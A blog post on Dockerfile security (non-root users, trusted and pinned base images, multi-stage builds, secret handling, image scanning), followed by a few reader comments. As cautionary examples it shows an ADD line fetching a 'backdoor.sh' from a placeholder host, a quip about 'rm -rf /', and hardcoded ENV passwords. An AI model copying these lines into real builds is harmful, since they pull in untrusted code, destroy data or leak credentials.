Stop shipping insecure Dockerfiles: real devs don’t run as root

From base image blunders to runtime disasters: let's lock down that container before it escapes the lab.

Introduction: Your Dockerfile is a ticking time bomb unless you secure it

Dockerfiles are like spells: simple to write, powerful in execution, and incredibly easy to screw up. You write 10 lines, ship it to production, and boom, you're running a containerized service in the cloud. Feels magical, right? Well, that magic comes with a curse: insecurity by default.

Here's the thing: Docker doesn't stop you from doing dumb stuff. It happily lets you:

  • Run everything as root
  • Add shady scripts from the internet
  • Bake secrets into the image
  • And pull a 2GB Ubuntu base image just to run curl.

If you're guilty of any of these, don't worry, we've all been there. But it's 2025, and the internet is way less forgiving. One misconfigured Dockerfile can be a hacker's golden ticket into your infrastructure.

In this guide, we'll walk through practical, battle-tested Dockerfile security best practices. No corporate nonsense, just real talk for developers who want to stop shipping containers like they're spinning a roulette wheel.

Let’s fix that Dockerfile before it becomes a DocuHell.

Section 2: The root of all evil: don't run containers as root

Let’s get this out of the way: if your Docker container runs as root, you’re basically handing out the admin keys to anyone who finds a way in. In the early Docker days, we all did it. It was convenient. Fast. Harmless... until it wasn’t.

Running as root inside a container doesn't magically isolate you from the host. Sure, containers aren't VMs, but they share the host's kernel. That means a container breakout vulnerability (like CVE-2019-5736) could allow malicious code inside your container to execute commands on the host as root. Let that sink in.

Even worse, if you’re mounting volumes (-v /:/host) or using privileged mode (--privileged), you're basically saying:

“Come on in, feel free to rm -rf /, I trust you.”

✅ The fix: Use a non-root user

Here’s how to properly sandbox your app:

Dockerfile
# Create a new user and switch to it
RUN addgroup --system appgroup && adduser --system appuser --ingroup appgroup
USER appuser
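
Heads-up: the long flags above match Debian/Ubuntu-based images; on Alpine, the BusyBox equivalent is something like RUN addgroup -S appgroup && adduser -S appuser -G appgroup.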

Or better, use an official image that already comes with a non-root user:

Dockerfile
FROM node:18-alpine
USER node

Dev pro tip:

  • Running as non-root might require fixing file permissions on volumes (chown -R appuser:appgroup /app) or setting the right WORKDIR.
  • Some tools (especially ones that bind to low ports like 80 or 443) may not work without root; use higher ports and handle redirection at the reverse proxy level (see the sketch below).
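
Putting it together, here's a minimal sketch (assuming a Node app with a server.js entrypoint, listening on port 3000 behind a reverse proxy):

Dockerfile
FROM node:18-alpine
WORKDIR /app
# Copy sources owned by the image's built-in non-root user
COPY --chown=node:node . .
RUN npm ci --omit=dev
# Bind to a high port; let the reverse proxy own 80/443
EXPOSE 3000
USER node
CMD ["node", "server.js"]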

Section 3: Use trusted base images or welcome the chaos

So you’ve installed Node, Python, or Java in your Docker image, everything’s working, and you’re feeling like a 10x engineer.
But wait: did you check where that base image came from?
If you pulled some random node:latest from Docker Hub and called it a day, congrats, you might've just invited malware into your production stack.

Why untrusted base images are a disaster waiting to happen

A shady base image can:

  • Contain outdated or vulnerable packages,
  • Be bloated with unused dependencies,
  • Or worse, have deliberate backdoors.

And yes, this has happened. In 2021, researchers found hundreds of malicious images on Docker Hub with cryptominers, obfuscated scripts, and spyware.

Even if it’s not evil, many unofficial images are just… badly made. Think of them like GitHub gists from 2013 with no documentation or updates. Would you trust that in prod?

The fix: Use slim, official, and verified images

Here’s how to make smarter choices:

  • ✅ Use official images from Docker (library/) when possible. Examples: node:18-alpine, python:3.11-slim, nginx:stable
  • ✅ Consider distroless images (by Google) to reduce attack surface. These have no package manager, no shell, no fluff, just your app

https://github.com/GoogleContainerTools/distroless

  • ✅ Use digest pinning to lock the image to a specific, verified hash

Dockerfile:

FROM node@sha256:123abc... # instead of node:latest

Dev pro tip:

Use trusted sources like Docker Official Images, Docker Verified Publisher images on Docker Hub, and Google's distroless project linked above.

Section 4: Keep it lean: smaller images = smaller attack surface

Let's be honest: your Docker image doesn't need to be a bloated 1.5GB Debian monster just to serve a static website. That's like wearing plate armor to a water gun fight. Not only does it slow down your CI/CD pipelines, but it also opens more doors for attackers.

The bigger your image, the more stuff it contains, and the more chances something inside is vulnerable. Each binary, each library, and each config file could be a potential entry point.

Why size matters (in Docker)

  • Longer build & pull times = slower deployments
  • More packages = more CVEs
  • Harder to audit = more surprises when you finally scan it

Want to cut the fat? Then let’s go ninja mode.

The fix: Multi-stage builds & minimal bases

Here’s what a better Dockerfile looks like using multi-stage builds:

Dockerfile
# Stage 1: Build
FROM node:18-alpine AS builder
WORKDIR /app
COPY . .
RUN npm ci && npm run build

# Stage 2: Production
FROM nginx:alpine
COPY --from=builder /app/dist /usr/share/nginx/html

Boom: you just kept Node and all the build tools out of production. The final image only contains static files and a tiny NGINX server.

Want to go even leaner? Try using:

  • alpine (5MB base)
  • busybox (bare minimum)
  • distroless (no shell, no package manager; hackers hate this trick)
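
For instance, a distroless final stage might look like this (a sketch, assuming a multi-stage build whose builder stage puts a Node app in /app):

Dockerfile
# No shell, no package manager; there's also a :nonroot tag variant if you want to drop root too
FROM gcr.io/distroless/nodejs18-debian11
COPY --from=builder /app /app
WORKDIR /app
# The distroless Node image already uses node as its entrypoint, so just pass the script
CMD ["server.js"]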

Dev pro tip:

Use COPY instead of ADD unless you absolutely need remote URL fetching or auto-unpacking archives.
ADD is like using eval() in JavaScript. It does too much, and that’s dangerous.

Dockerfile
# Good
COPY myfile.txt /app/

# Suspicious
ADD http://someurl.com/backdoor.sh /app/

Keep your containers lean, mean, and boring, and hackers will get bored too.

Section 5: Environment variables and secrets: stop hardcoding passwords

Let’s play a game:
🫵 You show me your Dockerfile, and I’ll tell you where your database password is.

Because if you're using ENV DB_PASSWORD=supersecret123, congrats: you've just hardcoded your secrets into the image and handed them to anyone who pulls it. 🔓

And it gets worse. These secrets:

  • Are visible in image layers (docker history)
  • Show up in container logs
  • Can be extracted with basic inspection tools

You wouldn’t post your root password on Twitter, right? Then why leave it inside an image that gets pushed to Docker Hub?

The wrong way (aka “how to get hacked 101”)

Dockerfile
ENV DB_USER=root
ENV DB_PASSWORD=supersecret

Please, no.

The secure way to manage secrets

Use runtime environment variables

Pass secrets at runtime instead of baking them into the image:

docker run -e DB_USER=admin -e DB_PASSWORD=$DB_PASSWORD myapp

Use .env files locally, but never commit them.
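
For example (assuming a local .env file full of KEY=value pairs that's listed in .gitignore):

# Load secrets from a git-ignored file at runtime, not at build time
docker run --env-file .env myapp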

Use secret management tools
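
For anything beyond local development, reach for a dedicated secret manager (Vault, AWS Secrets Manager, Kubernetes Secrets) or Docker's built-in secrets support. Here's a minimal Docker Compose sketch, assuming a myapp service and a db_password.txt file kept out of git:

# docker-compose.yml
services:
  myapp:
    image: myapp:latest
    secrets:
      - db_password   # exposed at /run/secrets/db_password inside the container
secrets:
  db_password:
    file: ./db_password.txt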

Clean your build context

Use .dockerignore to prevent accidentally copying your local secrets or .env files into your image:

node_modules
.env
*.pem
*.key

Bonus: Build-time secrets (with BuildKit)

If you’re using Docker BuildKit (which you should), you can securely pass secrets to the build phase without exposing them in layers:

DOCKER_BUILDKIT=1 docker build --secret id=mysecret,src=mysecret.txt .

In your Dockerfile:

# syntax=docker/dockerfile:1.2
RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret
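
The secret is mounted at /run/secrets/mysecret only for that single RUN instruction; it never ends up in an image layer or in docker history.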

Now we’re talking hacker-proof containers.

Section 6: Pin your versions or watch your build blow up

Here’s a Docker horror story:
You deploy a perfectly working container to production using node:latest.
A week later, without changing a single line of code, your build starts failing. Or worse, your app crashes.
Why?
Because latest moved on, but your code didn’t.

Using unpinned versions is like depending on your ex to still answer your calls: it's unreliable, unpredictable, and eventually painful.

Why pinning matters

  • latest isn't stable; it changes whenever the publisher updates it.
  • Builds become non-reproducible; you can't guarantee the same result over time.
  • New versions might introduce breaking changes or vulnerabilities.

And don’t even get me started on using apt-get install somepackage without pinning the version. One update later and you’re debugging version conflicts for hours. Been there, hated it.

The fix: Pin all the things

Pin your base images:

# BAD
FROM node:latest
# BETTER
FROM node:18-alpine
# BEST (reproducible builds)
FROM node@sha256:abc123... # Use digests for ultra-stability

Pin your dependencies

In Node.js:

npm ci   # uses package-lock.json for exact versions

In Python:

pip install -r requirements.txt  # with exact versions

In Linux:

Dockerfile
RUN apt-get install -y nginx=1.18.*  # be specific

Use lockfiles, dependency managers, or even tools like pip-tools, poetry, or npm shrinkwrap to control what versions go in.

Dev pro tip:

If you really want reproducibility, pin the entire image with a digest hash (you can grab it from the output of docker pull node:18-alpine, or from Docker Hub under the Tags tab). That way, even if node:18-alpine changes upstream, your build won't.
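
If the image is already on your machine, one way to read its digest (assuming node:18-alpine has been pulled) is:

docker inspect --format '{{index .RepoDigests 0}}' node:18-alpine
# prints something like node@sha256:...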

Section 7: Scan your Dockerfile and image before pushing

You wouldn’t push code without running tests (hopefully). So why are you pushing containers without checking them for vulnerabilities?

Think of container scanning as your linter for security. It tells you things like:

  • “Hey, that base image has 43 CVEs.”
  • “You’re installing outdated libraries with known exploits.”
  • “This container has enough attack surface to be a CTF challenge.”

And no, you don’t need an expensive enterprise tool to do this. There are amazing open-source scanners that work right from your terminal.

Tools that make image scanning easy

Trivy

Fast, free, and packed with features.

trivy image myapp:latest

Finds:

  • OS package vulnerabilities
  • Misconfigured Dockerfiles
  • Embedded secrets

Snyk

Free for individuals, CI integration-friendly, and dev-friendly.

snyk test --docker myapp:latest

🐳 Docker Scout

Docker’s official tool for vulnerability tracking.

docker scout quickview myapp:latest

Automate it in CI/CD

Add scanning as a step in your GitHub Actions or GitLab CI:

# .github/workflows/security.yml
jobs:
  docker-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run Trivy vulnerability scanner
        uses: aquasecurity/trivy-action@master
        with:
          image-ref: 'myapp:latest'
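
If you want the job to actually fail on findings, trivy-action also accepts exit-code and severity inputs (for example, exit-code: '1' with severity: 'HIGH,CRITICAL') in the with: block.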

This makes sure nobody slips a vulnerable image into your registry on a sleepy Friday afternoon.

Dev pro tip:

Also scan your Dockerfile using hadolint:

hadolint Dockerfile

It’ll yell at you for doing insecure stuff like:

  • Using ADD instead of COPY
  • Not using USER
  • Installing without --no-cache

Section 8: Final checklist: the Dockerfile security cheat code

Okay, we’ve been through the trenches:
Bad base images, root users, bloated containers, secret leaks, you name it.
Now it's time to tighten it all up like a proper dev boss, with a checklist you can slap on every project like a cheat code.

Here’s your no-BS Dockerfile security checklist — print it, commit it, tattoo it on your CI pipeline:

Dockerfile security checklist

User & permissions

  • Do NOT run containers as root
  • Use USER directive with a non-privileged user
  • Fix permissions for mounted volumes or created directories

Base image

  • Use official or verified images
  • Prefer minimal images (alpine, distroless, slim)
  • Pin base image versions or use digests

Image size & build

  • Use multi-stage builds to keep production images lean
  • Avoid unnecessary packages
  • Use COPY instead of ADD unless needed
  • Use .dockerignore to exclude junk and secrets

Secrets & environment

  • Never hardcode secrets using ENV
  • Use runtime variables, .env, or secret managers
  • Use Docker BuildKit for build-time secrets

Scanning & auditing

  • Scan images using Trivy, Snyk, or Docker Scout
  • Lint Dockerfiles with hadolint
  • Automate scanning in CI/CD pipelines

Dependency hygiene

  • Lock dependency versions (package-lock.json, requirements.txt, etc.)
  • Avoid latest tags
  • Keep dependencies updated & minimal

Pro dev move: Turn this into a GitHub template

Create a docker-check.sh script, add it to pre-commit or CI, and never let an insecure Dockerfile sneak into your repo again.
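
A minimal sketch of what that script could look like (assuming hadolint and trivy are installed, and the image tag is passed as the first argument):

#!/usr/bin/env bash
# docker-check.sh: fail fast on lint errors or serious vulnerabilities
set -euo pipefail

IMAGE="${1:-myapp:latest}"

# Lint the Dockerfile (catches root users, ADD misuse, unpinned packages, etc.)
hadolint Dockerfile

# Scan the built image and fail on HIGH/CRITICAL findings
trivy image --exit-code 1 --severity HIGH,CRITICAL "$IMAGE"

echo "Docker security checks passed for $IMAGE"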

Section 9: Conclusion: why Dockerfile security isn't optional anymore

Let's be real: Docker is awesome. It lets us spin up environments in seconds, ship apps with zero config, and feel like cloud wizards. But with great power comes great potential for… catastrophe.

An insecure Dockerfile isn't just a DevOps problem.
It’s a you problem, especially when:

  • That image leaks a production database password
  • Your app gets popped through a container breakout
  • Or your CI pipeline starts mining crypto for someone in Eastern Europe

The good news? You don’t need to be a cybersecurity expert to write secure Dockerfiles.
Just follow the basics:

  • Don’t run as root.
  • Don’t trust random images.
  • Don’t bake secrets into your containers.
  • Do scan and pin like your job depends on it (because it does).

Security isn't flashy, but when done right, it's invisible.
And in a world of zero-day exploits and supply chain attacks, invisibility is underrated.

So the next time someone says “It’s just a Dockerfile, relax,”
you show them this checklist and say:

“Yeah… and it’s just a wide-open port in production. What could go wrong?”

Helpful resources

Top comments (3)

Shifa

🚀 Great article! I really enjoyed your insights. Let's support each other on our coding journeys — feel free to follow me, and I’ll follow back!

Check my latest article ->
dev.to/shifa_2/stop-letting-javasc...

spO0q

Docker security is a common concern.

Many configurations use root for convenience while it extends the attack surface drastically.

nadeem zia

Good information given